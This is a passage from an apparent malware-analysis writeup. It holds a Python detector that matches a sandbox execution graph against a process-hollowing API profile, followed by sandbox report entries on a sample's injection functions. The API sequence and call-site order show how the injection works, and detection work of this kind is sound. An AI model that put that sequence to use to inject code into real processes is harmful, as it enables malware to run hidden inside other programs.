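assumptions and HOLLOWING_PROFILE are this example's own."""
import re
from collections import defaultdict

EXEC_GRAPH = (
    "execution_graph 5086 1510848 5087 151084e 5086->5087 5088 1510852 5087->5088 5090 1512211 5087->5090 "
    "5094 15163c0 5090->5094 5098 15163b3 5090->5098 5091 1512222 5091->5088 5095 15163cc 5094->5095 "
    "5096 15163d6 5095->5096 5102 151796a 5095->5102 5096->5091 5099 15163cc 5098->5099 5100 15163d6 5099->5100 "
    "5101 151796a 11 API calls 5099->5101 5100->5091 5101->5099 5103 151797a 5102->5103 5128 1518030 5103->5128 "
    "5132 1518025 5103->5132 5104 1517a1c 5111 1517d27 5104->5111 5125 15184c8 ReadProcessMemory 5104->5125 "
    "5105 1517d80 5123 1518890 ResumeThread 5105->5123 5124 1518888 ResumeThread 5105->5124 5106 1517daf 5106->5095 "
    "5107 1517b01 5126 15185b8 VirtualAllocEx 5107->5126 5108 1517b7d 5108->5111 5117 1518660 WriteProcessMemory 5108->5117 "
    "5118 1518658 WriteProcessMemory 5108->5118 5109 1517ce9 5119 1518660 WriteProcessMemory 5109->5119 "
    "5120 1518658 WriteProcessMemory 5109->5120 5110 1517bf0 5110->5109 5121 1518660 WriteProcessMemory 5110->5121 "
    "5122 1518658 WriteProcessMemory 5110->5122 5111 1517d27 5112 1517d63 5111->5112 5127 1518408 Wow64GetThreadContext 5111->5127 "
    "5112->5105 5115 15187c0 Wow64SetThreadContext 5112->5115 5116 15187c8 Wow64SetThreadContext 5112->5116 5115->5105 5116->5105 "
    "5117->5110 5118->5110 5119->5111 5120->5111 5121->5110 5122->5110 5123->5106 5124->5106 5125->5107 5126->5108 5127->5112 "
    "5129 15180c0 CreateProcessAsUserA 5128->5129 5131 151827f 5129->5131 5133 1518030 CreateProcessAsUserA 5132->5133 5135 151827f 5133->5135"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")                       # assumption: ids are short decimals
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}$", re.IGNORECASE)  # assumption: 6-8 hex-digit block addresses
SUMMARY_RE = re.compile(r"\b\d+ API calls\b")           # "N API calls" = summarised callee, not a node

# Process-hollowing profile (this example's own list).  Each step names the
# APIs that can implement it; the chain is complete when every step matches.
HOLLOWING_PROFILE = {
    "spawn target (normally suspended)": ("CreateProcessA", "CreateProcessW",
                                          "CreateProcessAsUserA", "CreateProcessAsUserW",
                                          "CreateProcessInternalW"),
    "inspect or unmap target image": ("ReadProcessMemory", "NtUnmapViewOfSection",
                                      "ZwUnmapViewOfSection"),
    "allocate in target": ("VirtualAllocEx", "NtAllocateVirtualMemory"),
    "write payload": ("WriteProcessMemory", "NtWriteVirtualMemory"),
    "redirect entry point": ("SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"),
    "resume target": ("ResumeThread", "NtResumeThread"),
}


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> {"addr": int, "apis": [str]},
    edges maps id -> successor ids in textual order."""
    tokens = SUMMARY_RE.sub("", text).split()
    nodes, edges = {}, defaultdict(list)
    current = None                      # node whose API labels we are collecting
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[int(m.group(1))].append(int(m.group(2)))
            current = None
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if NODE_ID_RE.match(tok) and ADDR_RE.match(nxt):
            nid = int(tok)
            # A node may be listed twice (5111 is); keep the first record.
            nodes.setdefault(nid, {"addr": int(nxt, 16), "apis": []})
            current = nid
            i += 2
            continue
        if current is not None and tok != "execution_graph":
            nodes[current]["apis"].append(tok)   # API label following a node definition
        i += 1
    return nodes, dict(edges)


def call_sites(nodes, edges):
    """Map each API name to the sorted addresses of the blocks that call it
    (the predecessors of the API-labelled nodes)."""
    preds = defaultdict(set)
    for src, dsts in edges.items():
        for dst in dsts:
            preds[dst].add(src)
    sites = defaultdict(set)
    for nid, node in nodes.items():
        for api in node["apis"]:
            for caller in preds.get(nid, ()):
                if caller in nodes:
                    sites[api].add(nodes[caller]["addr"])
    return {api: sorted(addrs) for api, addrs in sites.items()}


def match_hollowing(apis):
    """Return {step: matched API or None}; all steps matched = full chain present."""
    apis = set(apis)
    return {step: next((a for a in options if a in apis), None)
            for step, options in HOLLOWING_PROFILE.items()}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(EXEC_GRAPH)
    sites = call_sites(nodes, edges)
    for api, addrs in sorted(sites.items(), key=lambda kv: kv[1][0]):
        print(f"{api:24s} called from {', '.join(f'{a:x}' for a in addrs)}")
    verdict = match_hollowing(sites)
    for step, api in verdict.items():
        print(f"  {step:36s} {api or '-'}")
    print("process hollowing chain complete:", all(verdict.values()))
```

Run as a script it prints one line per API with its calling blocks. Inside the injector function 151796a the call sites sort into ReadProcessMemory (1517a1c), VirtualAllocEx (1517b01), WriteProcessMemory (1517b7d, 1517bf0, 1517ce9), Wow64GetThreadContext (1517d27), Wow64SetThreadContext (1517d63) and ResumeThread (1517d80), which is the usual hollowing order; CreateProcessAsUserA's immediate callers are the entry blocks of its own wrapper (1518025, 1518030), which 151797a reaches first. The matcher checks only that each step's API is present, not the order or the creation flags, so a full match is a strong indicator rather than proof.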

Control-flow Graph

Function 1518025-1518367, 41 basic blocks (rendered as a graph image in the report). Entry block 1518025-15180cc; three self-looping blocks at 15180ec-15180fb, 1518145-1518154 and 15181aa-15181b9; CreateProcessAsUserA is called in block 15181c3-151827d; blocks 1518302-1518305, 1518316-1518319 and 151832a-151832d each call 1515f98; the function ends in block 1518367, which loops to itself.
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0151826A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: b1baf53344a6b4fd7864df4f16cacac6f85800fe24f7493b0a20dfef275c5a45
                                          • Instruction ID: 56990af1610b5a130f9a7f3072de34ab2f19780a577ab0ec3df9add7d0ec6df5
                                          • Opcode Fuzzy Hash: b1baf53344a6b4fd7864df4f16cacac6f85800fe24f7493b0a20dfef275c5a45
                                          • Instruction Fuzzy Hash: 71912871D00619CFEB26CF69CD41BDEBBB2FB48300F0485A9E818AB254DB759985CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 1518030-1518367, 41 basic blocks (rendered as a graph image in the report). Entry block 1518030-15180cc; three self-looping blocks at 15180ec-15180fb, 1518145-1518154 and 15181aa-15181b9; CreateProcessAsUserA is called in block 15181c3-151827d; blocks 1518302-1518305, 1518316-1518319 and 151832a-151832d each call 1515f98; the function ends in block 1518367, which loops to itself.
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0151826A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 0084230d968d0127186ca2e08c84a40fee7ddb54ccc5dc07ec5b70af21889837
                                          • Instruction ID: d99ef6d0e9b28b15c7cfe5b21995f22531160c0c562a09d31ee24eff68cb8af8
                                          • Opcode Fuzzy Hash: 0084230d968d0127186ca2e08c84a40fee7ddb54ccc5dc07ec5b70af21889837
                                          • Instruction Fuzzy Hash: 9F912871D00619CFEB26CF69CD41BDEBBB2FB48300F0481A9E818AB254DB759985CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 1518658-1518724, 5 basic blocks (rendered as a graph image in the report). Entry block 1518658-15186b1 branches to 15186b3-15186bf or directly to 15186c1-15186fa, which calls WriteProcessMemory; from there either 15186fc-1518702 or the exit block 1518703-1518724 follows.
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 015186ED
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d4fe61d571bd5157379556a4bab51ac71a17e51efb63a57b183de32dbc1707e8
                                          • Instruction ID: a7097730fccec5ca6cf342f97443525eeba5e365f462ec33edd2d6215330c65f
                                          • Opcode Fuzzy Hash: d4fe61d571bd5157379556a4bab51ac71a17e51efb63a57b183de32dbc1707e8
                                          • Instruction Fuzzy Hash: 2A2103B1900249DFDB10CF9AC885BDEBFF4FB48310F50842AE918A7350D379A950CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 1518660-1518724, 5 basic blocks (rendered as a graph image in the report). Entry block 1518660-15186b1 branches to 15186b3-15186bf or directly to 15186c1-15186fa, which calls WriteProcessMemory; from there either 15186fc-1518702 or the exit block 1518703-1518724 follows.
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 015186ED
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d5b7d9374cd6c4f77b637d7cc7a8612640321e753099d26e8250e0c52f36fa64
                                          • Instruction ID: 58c46f700e9f7a8da9fc08f2db9e713cad92536f0970683f969ef1cfe6f8ce58
                                          • Opcode Fuzzy Hash: d5b7d9374cd6c4f77b637d7cc7a8612640321e753099d26e8250e0c52f36fa64
                                          • Instruction Fuzzy Hash: D021E0B5900259DFDB14CF9AC885BDEBFF4FB48310F10842AE918A7250D378A954CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 15187c0-1518879, 5 basic blocks (rendered as a graph image in the report). Entry block 15187c0-1518814 branches to 1518816-151881e or directly to 1518820-151884f, which calls Wow64SetThreadContext; from there either 1518851-1518857 or the exit block 1518858-1518879 follows.
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 01518842
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 331b89b6e923f9418c5108b19a94c5f38851ea68b44bac7d76d52ef663eca5c3
                                          • Instruction ID: 00c7ba0b8e68a4f6d3b19f1e812b18e338331648aa057bff58e45a9d1b6b829c
                                          • Opcode Fuzzy Hash: 331b89b6e923f9418c5108b19a94c5f38851ea68b44bac7d76d52ef663eca5c3
                                          • Instruction Fuzzy Hash: E12135B1D0021A9FDB14CF9AC985BDEFBF4FB48310F14812AD518A7250D378A904CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 15187c8-1518879, 5 basic blocks (rendered as a graph image in the report). Entry block 15187c8-1518814 branches to 1518816-151881e or directly to 1518820-151884f, which calls Wow64SetThreadContext; from there either 1518851-1518857 or the exit block 1518858-1518879 follows.
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 01518842
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 5dfe2da8bbcd9a1e723a2fd4bba9b5b249968818cdbd141456b42b10034892bf
                                          • Instruction ID: ddcc3384883527408051cef4e726c2c90e213ea95f9cdd54b2cf272e619fbf4c
                                          • Opcode Fuzzy Hash: 5dfe2da8bbcd9a1e723a2fd4bba9b5b249968818cdbd141456b42b10034892bf
                                          • Instruction Fuzzy Hash: 2F2115B1D002599BDB10CF9AD885BDEFBF4FB48310F14812AD918A7240D378A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 1518408-15184b6, 5 basic blocks (rendered as a graph image in the report). Entry block 1518408-1518454 branches to 1518456-151845e or directly to 1518460-151848c, which calls Wow64GetThreadContext; from there either 151848e-1518494 or the exit block 1518495-15184b6 follows.
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0151847F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 40ba7f9272bfd3b0b7fe296e998cdd1f87b34cbfceec9de646f79202c3a31b38
                                          • Instruction ID: 481f08f5d0b545c55c52dfc27d2e113c25666230a44db5efda03a0f147a829a9
                                          • Opcode Fuzzy Hash: 40ba7f9272bfd3b0b7fe296e998cdd1f87b34cbfceec9de646f79202c3a31b38
                                          • Instruction Fuzzy Hash: 0521F7B1D006199FDB14CF9AC585B9EFBF4FB48314F14812AD518A7240D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 15184c8-1518575, 3 basic blocks (rendered as a graph image in the report). Entry block 15184c8-151854b calls ReadProcessMemory and branches to 151854d-1518553 or directly to the exit block 1518554-1518575.
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0151853E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 8795e7e4e995d9a219c88f92336aee9dd5ec8d56a2bcbcc639bd7088d819a3b3
                                          • Instruction ID: 1603087bdcc4a36446932f419f77173bb4f1c7dfbc3efed9f3d7693ab917f470
                                          • Opcode Fuzzy Hash: 8795e7e4e995d9a219c88f92336aee9dd5ec8d56a2bcbcc639bd7088d819a3b3
                                          • Instruction Fuzzy Hash: B921C4B5900249DFDB10CF9AC985BDEBFF4FB48320F148429E918A7250D379A944DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 15185b8-151864d, 3 basic blocks (rendered as a graph image in the report). Entry block 15185b8-1518630 calls VirtualAllocEx and branches to 1518632-1518638 or directly to the exit block 1518639-151864d.
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01518623
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: e987967567b4dedc7d4181d455d58b366b2e08794a7ebf895f5110eb8529f268
                                          • Instruction ID: a8d5c998e8b155e48b8389b4f6221f941c9bb10d4d2827da80c34c68c41f8ea4
                                          • Opcode Fuzzy Hash: e987967567b4dedc7d4181d455d58b366b2e08794a7ebf895f5110eb8529f268
                                          • Instruction Fuzzy Hash: A81113B5800249DFDB20CF9AC884BDEBFF8FB48320F208419E518A7210C375A940CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 1518890-151891c, 3 basic blocks (rendered as a graph image in the report). Entry block 1518890-15188ff calls ResumeThread and branches to 1518901-1518907 or directly to the exit block 1518908-151891c.
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 015188F2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: ca4bb12effe51db31139c228650e2cd17c8451b5df8b3867e5afbbaff53fb9a2
                                          • Instruction ID: 41ad23be727809faaa521194afea8f6c6e06e4f8bf5cb25a7945cdf69f62b737
                                          • Opcode Fuzzy Hash: ca4bb12effe51db31139c228650e2cd17c8451b5df8b3867e5afbbaff53fb9a2
                                          • Instruction Fuzzy Hash: 2211F2B59002498FDB20CF9AD885B9EBFF8EB48324F208459D518A7240C375A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

Control-flow Graph

Function 1518888-151891c, 3 basic blocks (rendered as a graph image in the report). Entry block 1518888-15188ff calls ResumeThread and branches to 1518901-1518907 or directly to the exit block 1518908-151891c.
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 015188F2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 7700b4f9e4aef4462ee6588106c1181aacf8107c04cf08f43e26cc5e4e2c1c60
                                          • Instruction ID: fbb528dd2f64bae800bf3d9d29c450486e91ea3442fb0b89f69470954da880ed
                                          • Opcode Fuzzy Hash: 7700b4f9e4aef4462ee6588106c1181aacf8107c04cf08f43e26cc5e4e2c1c60
                                          • Instruction Fuzzy Hash: 1D1110B59002498EDB24CF9AC585B9EBFF8EB48320F20845AD518B7250C3786944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1695009997.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2d80000_bddddsx.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00c5385f34ad1c4f8ea6918cad2284c544d814506254d11cf2766bb0c1e0edcb
                                          • Instruction ID: 565b5b0acd20ff17af94767f6b536f620d59bc1b4242dcd416a45eea77e8c39d
                                          • Opcode Fuzzy Hash: 00c5385f34ad1c4f8ea6918cad2284c544d814506254d11cf2766bb0c1e0edcb
                                          • Instruction Fuzzy Hash: 4411D33165E3C04FE7834B3488A16C13FB1EF47715B2A05CBE680CB1A3D669AC0AD722
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hhq
                                          • API String ID: 0-4210879014
                                          • Opcode ID: fd13826974fd3ca1550abfefbaf9fd299d6720fea7e45e74739dffcc713e4b1e
                                          • Instruction ID: 8d231061ad45fbab0dc48d7d6d3573a540f3e8c995b2a18e5aa2b95d9780e59f
                                          • Opcode Fuzzy Hash: fd13826974fd3ca1550abfefbaf9fd299d6720fea7e45e74739dffcc713e4b1e
                                          • Instruction Fuzzy Hash: 6621BE70E052088FCB98EFB8C5556AE7FF1AF84344F2484AED409EB295DB384D05CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c9fc50a494199987e4bc1dd7e3bfe58278b3b2b976e4a4ebc7f5199f72fa037d
                                          • Instruction ID: 5d357ca0bdd66a7220380b322aa544ee48174d9ad5c80a698e8501f1e2e54193
                                          • Opcode Fuzzy Hash: c9fc50a494199987e4bc1dd7e3bfe58278b3b2b976e4a4ebc7f5199f72fa037d
                                          • Instruction Fuzzy Hash: BE7192707102158FCB58EF78D998A6E7BB2FFC8301B505928E506EB3A5DF349D058B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d01de818427fdaac5d20c8ab60e27b72eefa62398f6e2e2691943039c28d904
                                          • Instruction ID: 928160b160352c2164aab131ab27d71df74d4ba0945b77259c9854a85d47c71f
                                          • Opcode Fuzzy Hash: 3d01de818427fdaac5d20c8ab60e27b72eefa62398f6e2e2691943039c28d904
                                          • Instruction Fuzzy Hash: 32417FB17102058FCB58FF74E59866E7BA2FF982413406A3CD816A72A4EF389D458F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3889004ad9a70d887119d829cd68cda0e127c98c11c4cd6e0ef4ad1de59577b9
                                          • Instruction ID: 106cb28b682847efe44028ba77fc49882490aeae148ecbc5dc5c8b0eacf8b911
                                          • Opcode Fuzzy Hash: 3889004ad9a70d887119d829cd68cda0e127c98c11c4cd6e0ef4ad1de59577b9
                                          • Instruction Fuzzy Hash: C221C6B1B102155FCB04ABFD48583AF7ADAEFC8250B14943DD64ED7381DE349C0147A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d9c339dcfd7a03919451d83bf4fbcc062bad7c3117ebce52e56c7ac51b39b038
                                          • Instruction ID: 2a0de35e6aa8a5ea62ff2c367c4e2d88165fce02bb470817f74e93a723afafde
                                          • Opcode Fuzzy Hash: d9c339dcfd7a03919451d83bf4fbcc062bad7c3117ebce52e56c7ac51b39b038
                                          • Instruction Fuzzy Hash: 57312AB4E10209DFCB04EFB4D980AADBBB6FFC4304F109569E515A7350DB386A81DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ece1079a2e613b03d23139623418fa23b6813fbf22dbcec5c81bae1a7c232621
                                          • Instruction ID: 1c91aed6d1b808eb86cff5bd4ca2cf7771e3407aa8e7e3195be889ac1130d728
                                          • Opcode Fuzzy Hash: ece1079a2e613b03d23139623418fa23b6813fbf22dbcec5c81bae1a7c232621
                                          • Instruction Fuzzy Hash: 3E21AE71700B114BCB68BFB994A412E7AE2BF84214350992DD42B9B794DF34AE049FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcef3a08aece4f7992a775c71b87e0c053cef223c74e436b9925f267cce76164
                                          • Instruction ID: 9a002bac0ece479f7d7696efaed0e8af7416757758536b73ce4aab0acbeaafa2
                                          • Opcode Fuzzy Hash: bcef3a08aece4f7992a775c71b87e0c053cef223c74e436b9925f267cce76164
                                          • Instruction Fuzzy Hash: 0F212CB4A10209DFCB04EFB4D9846AD7BB6FFC4304B109569E515A7350DB386A81CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: feae579caaa0789691266207d9a58fb98ea5849a4792dca33f886e0570a222dc
                                          • Instruction ID: 2e9dcad86aec32a13f6da1ba50deb6482ad7db47ba62636259cbef33dd5cbca4
                                          • Opcode Fuzzy Hash: feae579caaa0789691266207d9a58fb98ea5849a4792dca33f886e0570a222dc
                                          • Instruction Fuzzy Hash: 4411F1F87001059FCB05EF14FA80A5537B5FBC4345B106ABCE404BB215DA7C6D869F81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7c53a6177c5b0c9769ec8b8c46a3f009ad942c5b129b3bf3bcda7a529d717ca
                                          • Instruction ID: d2919582408aedb5b08b09964d8cb3947b5361858ba39a8946eb1200b7052ca4
                                          • Opcode Fuzzy Hash: e7c53a6177c5b0c9769ec8b8c46a3f009ad942c5b129b3bf3bcda7a529d717ca
                                          • Instruction Fuzzy Hash: BC019CF87001059FCB05EF18FA80A5577B5FBC4345B10AABCB404AB225DA7C6D459F82
                                          Uniqueness

                                          Uniqueness Score: -1.00%